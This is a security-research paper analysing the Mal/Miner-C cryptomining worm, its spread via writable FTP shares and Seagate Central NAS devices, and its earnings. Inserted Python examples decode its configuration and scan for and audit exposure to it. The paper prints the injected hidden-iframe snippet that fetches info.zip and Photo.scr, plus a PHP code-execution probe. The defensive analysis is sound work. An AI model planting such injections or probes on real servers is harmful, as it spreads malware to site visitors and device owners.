Cryptomining malware on NAS servers

A couple of years ago, coin mining was a bubbling story. There were many threats that used infected machines to mine cryptocurrencies at the expense of the victim. Mining coins on someone else's machine could provide the attacker with free CPU resources from each infected system, so there was no need to steal directly from the victim. The infected machine would also deliver the block rewards from the mining operations into the attacker's wallet.

The idea was perfect from the criminal's point of view, but as time went on the average PC was no longer powerful enough to mine even a single coin. It was time to give up on this type of attack and turn the attention to other ways to make money, like ransomware. Recently a new malware family has found a way to use PCs efficiently to mine new types of cryptocurrency.
Attila Marosi, Senior Threat Researcher, SophosLabs

Cryptomining malware on NAS servers
Page 2 of 21
Contents

Introduction ........ 3
Monero: the cryptocoin ........ 3
Mal/Miner-C ........ 6
  The main NSIS ........ 6
  tftp.exe ........ 9
  Interesting notes ........ 10
  Telemetry of the threat ........ 11
Seagate Central ........ 12
Moneropool: mined coins ........ 15
  Let's do some math ........ 16
References ........ 21
Introduction

A couple of years ago, coin mining was a bubbling story. There were many threats that used infected machines to mine cryptocurrencies at the expense of the victim. Mining coins on someone else's machine could provide the attacker with free CPU resources from each infected system, so there was no need to steal directly from the victim. The infected machine would also deliver the block rewards from the mining operations into the attacker's wallet.

The idea was perfect from the criminal's point of view, but as time went on the average personal computer was no longer powerful enough to mine even a single coin. It was time to give up on this type of attack and turn the attention to other ways to make money, like ransomware. Recently a new malware family has found a way to use PCs efficiently to mine new types of cryptocurrency.

Monero: the cryptocoin

For Bitcoin, the main challenge with mining was the difficulty. As more blocks were discovered, the difficulty associated with mining new coins also increased exponentially. After a certain point there was no measurable profit to be gained from mining using personal PCs. [1] As you can see in the picture below, the difficulty of mining increased dramatically after 2012.

After that point in 2012, mining on PCs became unprofitable and criminals lost interest, so they gave up trying to use victims' computers to mine and turned their attention to other types of malware to make money.
Although mining Bitcoins is no longer profitable, there are plenty of other digital currencies that are quite new and are significantly less difficult to mine. Many of them have very good cryptographic protections, which can effectively hide their users. One of these cryptocurrencies is Monero. [2]

Monero is a new digital cryptocurrency that is easier to mine than Bitcoin, as you can see below.

In this state, mining this type of cryptocurrency is profitable. Criminals recognized this and started to spread a new malware payload that uses infected machines to mine coins at the expense of the system owner's CPU and GPU resources.

Based on my tests and information available on the internet, today's average CPU can calculate 50-1500 hashes per second. This is not much on its own, but if hundreds or thousands are pooled together it could be enough to be of interest to a criminal to exploit.

Most of today's PCs have a dedicated video module, or equipment to perform video rendering tasks, called a GPU. This module can increase the number of hash calculations dramatically.
(Source: https://www.cryptocoinsnews.com/scrypt-mining-nvidia-gtx-750-ti/)
Mal/Miner-C
(hash: 2a5b3c07e32b3b2b0c1ef33a10685027703440ec)

This threat is interesting not only for the technique it uses to spread and get new nodes to help calculate hashes for the cryptocurrency, but it also attempts to copy itself to open (or weak) FTP folders in the hope of being executed on other machines.

The main NSIS

We have seen many versions of this threat. It is developed and maintained continuously, but all the versions seem to share a specific property: all the versions are developed in NSIS [6].
It contains multiple versions of miners:

66b965d1ee4013c80f7e0e27725e43f3d316325a NsGpuCNMiner.exe
fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107 NsCpuCNMiner32.exe
ce1fbf382e89146ea5a22ae551b68198c45f40e4 NsCpuCNMiner64.exe

The NSIS script queries information about the host system's CPU type(s) and GPU capabilities before creating AutoRun entries used for running itself (NSCpuCNMine32.exe / NSCpuCNMine64.exe and NSGpuCNMine.exe).
The malware downloads the latest version of the NSIS script from one of these hosts:

• stafftest.ru
• hrtests.ru
• profetest.ru
• testpsy.ru
• pstests.ru
• qptest.ru
• prtests.ru
• jobtests.ru
• iqtesti.ru

The resources requested are typically named:

• stat.html
• test.html
• text.html

The downloaded document contains a list with the mining pools for which it will contribute. In our investigation it seems moneropool.com is the primary pool used by this threat.

stratum+tcp://mine.moneropool.com:3333
stratum+tcp://xmr.hashinvest.net:1111
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.cryptoescrow.eu:3333

The tmp.ini file contains the wallets to log the effort of the mining operations. The mining pool will count and finally send payment to these accounts:

The resources which are downloaded at runtime are obfuscated by ROT47 with a custom character set.
For example, the stat.html file originally looks like this:

After decoding:

This method gives the criminals an opportunity to update the malware each time it is started. Since it generates a new initialization file when it is launched, it helps the malware avoid security solutions. It also gives the botnet operators a chance to change the payload of the threat in the future, for example, dropping ransomware to the victim's machine after the mining business is no longer profitable.
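As an added illustration (not code from the paper or from the malware), here is ROT47 over a pluggable alphabet, which is what "ROT47 with a custom character set" amounts to: the standard variant rotates the 94 printable ASCII characters by 47, and the custom variant rotates some other ordered alphabet by half its length. The CUSTOM_CHARSET below is a hypothetical stand-in for the malware's unknown alphabet; it shows why a stock ROT47 decoder does not recover the downloaded configuration.

```python
# Standard ROT47 alphabet: the 94 printable ASCII characters '!' .. '~'.
STANDARD_CHARSET = "".join(chr(c) for c in range(33, 127))

# Hypothetical custom alphabet (constructed for this example, not the real one):
# digits, lowercase, uppercase, then the punctuation a pool URL needs. 71 chars.
CUSTOM_CHARSET = ("0123456789abcdefghijklmnopqrstuvwxyz"
                  "ABCDEFGHIJKLMNOPQRSTUVWXYZ:/+.-_=?&")


def rotate(text, charset=STANDARD_CHARSET, shift=None):
    """Rotate each character of `text` found in `charset` by `shift` positions.
    Characters outside the alphabet (newline, space, ...) pass through unchanged,
    which is why a rotated stat.html keeps its line structure.
    Default shift is half the alphabet: for an even-sized alphabet this makes
    the function self-inverse (classic ROT47); for an odd one it does not."""
    if len(set(charset)) != len(charset):
        raise ValueError("charset must not contain duplicate characters")
    n = len(charset)
    k = (n // 2) if shift is None else shift
    pos = {ch: i for i, ch in enumerate(charset)}
    return "".join(charset[(pos[ch] + k) % n] if ch in pos else ch for ch in text)


def encode(text, charset=STANDARD_CHARSET):
    return rotate(text, charset)


def decode(text, charset=STANDARD_CHARSET):
    # Decoding rotates backwards, so it is correct for odd-sized alphabets too.
    return rotate(text, charset, -(len(charset) // 2))


# Constructed sample resembling the decoded pool list quoted in the paper.
SAMPLE = ("stratum+tcp://mine.moneropool.com:3333\n"
          "stratum+tcp://xmr.hashinvest.net:1111\n")


def demo():
    """Return (standard round trip ok, custom round trip ok, wrong alphabet ok)."""
    std_ok = decode(encode(SAMPLE)) == SAMPLE
    custom_blob = encode(SAMPLE, CUSTOM_CHARSET)
    custom_ok = decode(custom_blob, CUSTOM_CHARSET) == SAMPLE
    wrong_alphabet_ok = decode(custom_blob) == SAMPLE   # stock ROT47 on custom data
    return std_ok, custom_ok, wrong_alphabet_ok


if __name__ == "__main__":
    print(demo())
```

The third flag is False: data rotated over a custom alphabet has to be decoded with that same alphabet, so an analyst first has to recover the character set from the sample.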
tftp.exe

Interestingly, not all the instances of the malware contain the tftp.exe file.

23ec304fab33af1cacf0a167aeb7465631286128 tftp.exe

This executable just randomly generates IP addresses and tries to log in. It has an embedded list of usernames and passwords that it uses to try to gain access.

It's a kind of worm: if a host gets infected, it not only serves its owner by mining digital currency, but it also tries to infect other systems via FTP services.

If the embedded credentials are able to successfully connect to an FTP service, it tries to copy itself to the server and modify an existing web-related file with the extension .htm or .php in an attempt to further infect visitors to the host system.

If a file with this extension is found, the threat injects source code that creates an iFrame referencing the files info.zip or Photo.scr.
If someone opens a page infected like this, the page will pop up a "save file" dialog. This kind of social engineering is needed to execute this threat, as it cannot infect machines automatically, but it brings the threat very close to the victim. Ultimately this threat needs the user to click or run the file in order for the new system to become infected.

This will be further described at the end of this paper. Since this action is noisy, the majority of potential devices that could be infected in this way have already been infected. After a time, the criminals behind this threat may opt to not spread this "tool" with the malware, as it may prove ineffective as a mechanism for infecting additional systems.

Interesting notes

There is a scanner- or hacker-related service that I have no detailed information on, but I have observed many times within the last year. It involves placing a file on the device with the name w0000000t.php.

This file contains:

<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>

If the file upload was successful, requesting this document as http://xxx.xxx.xxx.xxx/w0000000t.php would result in the following response:

nopenopenope

This provides the attacker with proof of code execution capabilities on the host.

While searching for Mal/Miner-C, we found many hosts identified with this method, indicating that the host was most likely compromised more than once. On the first occasion, w0000000t.php was deployed. Later, Mal/Miner-C may have been deployed using the knowledge of the host's ability to execute code on the device by injecting the iFrame.

<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
<iframe src=ftp://ftp:[email protected]//info.zip width=1 height=1 frameborder=0> </iframe>
<iframe src=Photo.scr width=1 height=1 frameborder=0> </iframe>
The highlighted credential was used in this case by Mal/Miner-C to upload an instance of info.zip and Photo.scr as well as to infect the .php file.
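For a defender checking a web root or NAS share, the two markers above are easy to scan for: a 1x1 iframe whose src ends in info.zip or Photo.scr, and the w0000000t.php probe body. The following scanner is an added example, not tooling from the paper; the sample page it checks is constructed here and uses a placeholder address and credential rather than the ones seen in the wild.

```python
import re
from pathlib import Path

IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)
DROPPER_RE = re.compile(r"(?:info\.zip|photo\.scr)$", re.IGNORECASE)
HIDDEN_RE = (re.compile(r"\bwidth\s*=\s*['\"]?1\b", re.IGNORECASE),
             re.compile(r"\bheight\s*=\s*['\"]?1\b", re.IGNORECASE))
PROBE_MARKER = 'base64_decode("bm9wZW5vcGVub3Bl")'   # w0000000t.php body
DROPPED_FILES = {"photo.scr", "info.zip"}
WEB_EXTS = {".htm", ".html", ".php"}


def scan_content(content):
    """Return a list of (kind, detail, hidden) indicators found in one file's text."""
    hits = []
    for tag in IFRAME_TAG_RE.findall(content):
        src = SRC_RE.search(tag)
        if src and DROPPER_RE.search(src.group(1)):
            hidden = all(rx.search(tag) for rx in HIDDEN_RE)   # 1x1 frame?
            hits.append(("injected_iframe", src.group(1), hidden))
    if PROBE_MARKER in content:
        hits.append(("w0000000t_probe", PROBE_MARKER, False))
    return hits


def scan_tree(root):
    """Walk a directory; report dropped payload names and web files carrying markers."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.name.lower() in DROPPED_FILES:
            report[str(path)] = [("dropped_file", path.name, False)]
        elif path.suffix.lower() in WEB_EXTS:
            try:
                hits = scan_content(path.read_text(errors="replace"))
            except OSError:
                continue
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample mirroring the injected snippet quoted above (placeholder host/credential).
SAMPLE_PAGE = ('<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?> '
               '<iframe src=ftp://user:pass@192.0.2.10//info.zip width=1 height=1 frameborder=0> </iframe> '
               '<iframe src=Photo.scr width=1 height=1 frameborder=0> </iframe>')

if __name__ == "__main__":
    for hit in scan_content(SAMPLE_PAGE):
        print(hit)
```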
Telemetry of the threat

In the first 6 months of this year we counted 1,702,476 individual instances of this threat. However, the number of unique IP addresses corresponding to these instances was only 3,150. The reason for this is simple: the threat is trying to log in to FTP services with embedded credentials (anonymous, root, admin, etc.) with default and frequently used weak passwords. If successful, and the account has write access via the FTP service, it will copy Photo.scr and info.zip to each folder recursively. Thus, if a single FTP server is infected, it is infected with multiple instances.
Seagate Central

This threat is not targeting the Seagate Central device specifically; however, the device has a design flaw that allows it to be compromised. Almost all of these devices have already been infected by this threat.

This is how the Seagate Central device separates the private and public folders.

(Seagate private and public folder concept)
As you can see, the device can facilitate multiple levels of access, including many private accounts as well as a built-in public account. If you read the manual carefully, you will find a set of properties like this:

• By default the NAS system provides a public folder for sharing data. This public folder and account cannot be deleted or deactivated.
• For private data, one must create users, and each user will have associated folders and individual login credentials.
• The admin user has the ability to enable the device for remote access or turn this feature off entirely.
• If the device is enabled for remote access, all the accounts will be available on the device, including the anonymous user. In this state, your device is open for anyone to write to your public folder.
• Note: The device can be used to stream your media content from a remote location, but only the public folder content can be streamed in this way. Many other features are only available from the public folder. I suspect that this is one of the reasons why so much personal data resides in the public folder, as users do not switch between folders. They utilize the one which provides them the most flexibility and functionality, and in most cases that is the public one.

If we log in to a Seagate Central, we will see something like this:
There is a folder Photos and a file Photo.scr (sadly, on most Windows machines file extensions are not displayed), and it also has a deceptive icon that is intended to look like a typical Windows folder icon.

Anyone could easily be misled into double-clicking on the file and causing the program to begin execution on the machine.

Turning off the remote access can prevent the infection, but also means we lose the ability to access the device remotely.
Moneropool: mined coins

Moneropool is a mining community to mine the Monero cryptocurrency. It is based on a mining framework called node-cryptonote-pool.

([7] https://moneropool.com/)

Luckily, if you know the hash of the wallet you can get a report about its activities. The most interesting parts of this report are the Total Paid and the Hash Rate. The hash rate is an accumulated value. Using this we can calculate how many coins can be mined in a day.
The Total Paid is the money that the criminals already get, the real profit of the network.

We also get the payment history, but with this technology there is no way to track the payments, which is one of the primary features of this cryptocurrency.

(address information)

Let's do some math

Because the mining pool site shares much of this information and we know the wallet addresses collecting the rewards, we can do some calculations about the network and discover what was "mined" by it.
Here are the known wallet hashes:

Luckily the framework used by Moneropool (node-cryptonote-pool) [3] has a good API interface and data can be queried easily:

curl 'https://api.moneropool.com/stats_address?address=4ASTnar5DSKjPW6kD5D5wm4Ha9abEeUU2ik2D3KwBxTV88iV5AHTraxLpAU4ZGbzneh4ohNCjX1LBZYPtuzN3xKxGrtrU2g&longpoll=true' | python -m json.tool

The result:

In this case, using only one wallet address, the mining pool sent 4,913.5 XMR cryptocoins to the criminal's wallet. At the moment of the HTTP request, the accumulated hash rate of the infected machines was 33,370 hashes per second.

If we iterate over all the wallet addresses and calculate the full power of the network, then add the money they have already mined, we get this:

moneropool.com has paid 58,577 XMR to them. At the time of the calculation the exchange rate from XMR to EUR is 1.3 EUR.
([4] https://www.coingecko.com/en/price_charts/monero/eur)

With the exchange rate at the time it was worth 76,599 EUR.

Furthermore, the network of the infected machines has an accumulated power to calculate 431,000 hashes per second. According to the calculator of the site, it is enough to mine 327.7 XMR each day.

Using the same method as before, we can estimate that they earn approximately 428 EUR each day.

One interesting final note: the entire moneropool.com pool has 861,000 hashes per second accumulated at this rate. And the network of the infected machines has 431,000 hashes per second, which means roughly half of the total pool doing the mining is doing so unintentionally via infected systems.

Here is what the full Monero mining community looks like: 2.5% of the whole mining capacity comes from infected machines.
Anonymous FTPs with write access

In this case, Mal/Miner-C used a very simple and well-known configuration mistake to spread itself all over the world. We decided to see just how many homes and small businesses had vulnerable devices by scanning the internet to look for them.

First, we used a search engine called Censys to enumerate just under 3 million FTP servers worldwide. Then we fed this list into a scanning script that:

• Tried to connect anonymously to the FTP service.
• If allowed, retrieved a directory listing from the device (to provide an indication of compromise based on file names).
• If allowed, tested to see if write access was permitted.
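The same three checks, pointed at your own NAS or FTP server rather than the internet, make a useful self-audit. The script below is an added example, not the scanning script used for the paper; the host is a parameter you supply, the canary file name is an assumption, and classify_listing() is kept separate so it can be exercised on a constructed listing without a live server.

```python
import ftplib
import io

# File names the paper reports being copied into every writable folder,
# plus the w0000000t.php probe seen on previously compromised hosts.
DROPPED = {"photo.scr", "info.zip"}
PROBE = "w0000000t.php"
CANARY = ".write-check-remove-me"   # assumed, harmless name for the write test


def classify_listing(names):
    """Pure check over a directory listing: which known indicator names are present."""
    present = {n.rsplit("/", 1)[-1].lower() for n in names}
    return sorted(ind for ind in DROPPED | {PROBE} if ind in present)


def audit_ftp(host, port=21, timeout=5):
    """Anonymous login, listing, and write test against a server you administer.
    Returns a dict describing the exposure; never leaves the canary file behind."""
    result = {"host": host, "anonymous": False, "indicators": [], "writable": False}
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login()                      # anonymous login, no credentials
    except ftplib.all_errors as exc:
        result["error"] = str(exc)       # refused or closed: anonymous access is off
        return result
    result["anonymous"] = True
    try:
        try:
            result["indicators"] = classify_listing(ftp.nlst())
        except ftplib.all_errors:
            pass                         # listing denied, anonymous read is restricted
        try:
            ftp.storbinary(f"STOR {CANARY}", io.BytesIO(b""))
            result["writable"] = True    # this is the configuration the worm needs
            ftp.delete(CANARY)
        except ftplib.all_errors:
            pass                         # write denied: good
    finally:
        ftp.close()
    return result


if __name__ == "__main__":
    import sys
    print(audit_ftp(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"))
```

An "anonymous": True with "writable": True result is the exposure described in this section; "indicators" non-empty means the share has very likely already been visited.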
The results were as follows:

• IP numbers of FTP servers on original list: 2,932,833
• FTP servers active during the test: 2,137,571
• Active servers allowing anonymous remote access: 207,110
• Active servers where write access was enabled: 7,263
• Servers contaminated with Mal/Miner-C: 5,137
More than 70% of the servers where write access was enabled had already been found, visited and "borrowed" by crooks looking for innocent-sounding repositories for their malware.

If you've ever assumed that you're too small and insignificant to be of interest to cybercriminals, and thus that getting security settings right is only really for bigger organizations, this should convince you otherwise.

Very bluntly put, if you're not part of the solution, you're very likely to become part of the problem.
References

[1] http://theconversation.com/bitcoin-mining-is-about-to-become-a-lot-less-profitable-58302
[2] https://en.wikipedia.org/wiki/Monero_(cryptocurrency)
[3] https://github.com/zone117x/node-cryptonote-pool
[4] https://www.coingecko.com/en/price_charts/monero/eur
[5] http://www.seagate.com/files/www-content/support-content/external-products/seagate-central/en-us/seagate-central-user-guide-us.pdf
[6] https://en.wikipedia.org/wiki/Nullsoft_Scriptable_Install_System
[7] https://moneropool.com/